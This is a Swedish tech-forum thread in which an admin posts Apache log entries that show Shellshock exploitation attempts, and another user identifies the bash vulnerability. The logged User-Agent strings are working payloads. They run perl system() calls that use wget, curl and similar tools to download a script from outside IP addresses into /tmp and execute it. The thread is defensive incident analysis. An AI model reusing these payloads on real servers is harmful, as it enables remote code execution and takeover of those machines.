AMD Ryzen9 5900X || Gigabyte X570 Ultra || RTX 3090 FE || Gskill Trident Z 3600 64GB || Samsung 950 Pro 512GB || Samsung 960 Pro 1024GB || XB270HU 1440p IPS G-Sync
Exekvera kod via User-agent
På flera av mina Apace2-servrar har jag följande i logfilerna
202.78.94.70 - [13/Jan/2016:22:48:36 -0800] "GET / HTTP/1.1" 200 444 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png \");'"
Sista parametern i loggen är User-Agent. Personen försöker mao skicka exekverbar kod i den. Jag har mycket svårt att se att Apache2 eller någon webserver skulle försöka exekvera user-agent-strängen som kod.
Jag har sökt på nätet efter detta men inte hittat något. Är detta någon som vet vad det är för säkerhetshål han försöker utnyttja, jag har svårt att se att det skulle fungera med Apache, men det kanske rör sig om någon random-hemma-router som har det.
Ser ut som någon som försöker utnyttja Shellshock-hålet som fanns i bash och i vissa fall kunde utnyttjas i t.ex. CGI.
Tack för svaret, verkar onekligen vara det.
Jag gick manuellt in på länken som försöktes laddas ner, därmed blev jag flaggad som infekterad, den riktiga attacken kom därefter
vps-1050414-945.cp.idhost.kz - - [18/Jan/2016:12:44:07 -0800] "GET /phppath/php HTTP/1.1" 404 304 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ; cd /tmp/;wget http://212.154.211.81/j.txt;curl -O http://212.154.211.81/j.txt;fetch http://212.154.211.81/j.txt;lwp-download http://212.154.211.81/j.txt; perl j.txt 204.232.209.188\");'"
Han försöker ladda ner perl-scriptet
och sedan exekvera det. Totalt är det 136 försök.
- Igår Bättre ljus och sämre ögon när Starfields grafik ställs mot 2022 19
- 15 / 6 Stora Steam-uppdateringen är här – anteckna och titta på videor i spel 35
- 13 / 6 Microsoft: "Starfield är Bethesdas minst buggiga spel hittills" 64
- 12 / 6 Kan din dator köra Starfield? 101
- 12 / 6 Cyberpunk 2077 utökar med spionäventyr i höst 24
- Quiz: MSI utmanar om moderna grafikkort39
- Windows 11, lokalt konto eller microsoft konto?76
- Krönika: 50-åringen vi tar för givet19
- EU vill få ut Huawei ur 5G-nät snabbare31
- Samlingstråd för roliga länkar, filmer och bilder2093
- Intels grafikkort "Arc" – samlingstråd55
- Stationär gamingdator för ca 11k5
- Ska köpa en dator från Inet med delbetalning genom Qliro22
- Hur mycket borde man tjäna som utvecklare?128
- captcha vid inloggning fungerar inget bra längre.0
- Säljes Thinkpad X1 Carbon G3|i7-5500U|256GB|8GB|FullHD IPS
- Säljes MSI Radeon RX 6700 XT MECH 2X 12G OC
- Köpes Gaming burk sökes
- Säljes XFX RX 6600XT + Corsair RM850
- Säljes Xtrfy Tangentbord, mus, musmatta, headset
- Säljes Stationär Dator, Chassi, minnen och Tangentbord
- Säljes Säljer/Skänker PSU, CPU-block, D5TOPX2, Pump, Glasreservoarer, AirPlex 4x120 radiator, fittings, All in one Dator
- Säljes Dator till knatte (Gtx1080, 7700k, 16gb ddr3, 256gb m2)
- Säljes Phantex D30 3-pack svart regular+reverse | corsair af120 elite rgb 6st | ekwb velocity2 am5 gold | Kingston ddr5 6000mhz cl36
- Säljes Okej 1080 p dator
- Bättre ljus och sämre ögon när Starfields grafik ställs mot 202219
- Nätdel från Be Quiet drabbas av smält 12VHPWR-kontakt41
- Krönika: 50-åringen vi tar för givet19
- Helgsnack: Vilken uppgradering har varit viktigast för dig?92
- EU vill få ut Huawei ur 5G-nät snabbare31
- Microsoft fasar ut Xbox One21
- EU röstar ja till krav på utbytbara batterier68
- Digitalt ID-kort i mobilen lanseras på måndag113
- Elektronikbranschen flaggar för rejäla prisökningar174
- Northvolt skjuter upp fabriksbygge i Sverige49